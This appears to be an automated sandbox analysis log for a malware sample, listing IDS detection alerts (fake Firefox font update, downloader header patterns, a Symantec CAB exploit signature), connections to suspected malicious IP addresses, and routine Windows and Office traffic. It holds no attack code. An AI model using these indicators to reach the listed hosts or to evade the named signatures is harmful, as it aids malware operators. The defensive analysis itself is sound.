Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49880 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49885 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49883 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49892 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49897 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49902 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49904 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49911 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49915 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49920 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49909 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49923 -> 104.21.16.142:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49934 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49949 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49951 -> 104.21.16.142:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49968 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49964 -> 104.21.16.142:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49966 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49981 -> 104.21.16.142:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49984 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49995 -> 104.21.16.142:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49998 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50021 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50034 -> 104.21.16.142:443
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:50003 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50051 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:60467 -> 104.21.16.142:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:60481 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:60494 -> 104.21.16.142:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49952 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:60511 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:60560 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:60563 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:60570 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:60572 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:60575 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:60573 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:60574 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:60576 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49736
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49730

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F0E0C0 recv,recv,recv,recv,

0_2_00F0E0C0

Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=fgmCF13FEfPZ7KT&MD=glmp5CVV HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=fgmCF13FEfPZ7KT&MD=glmp5CVV HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
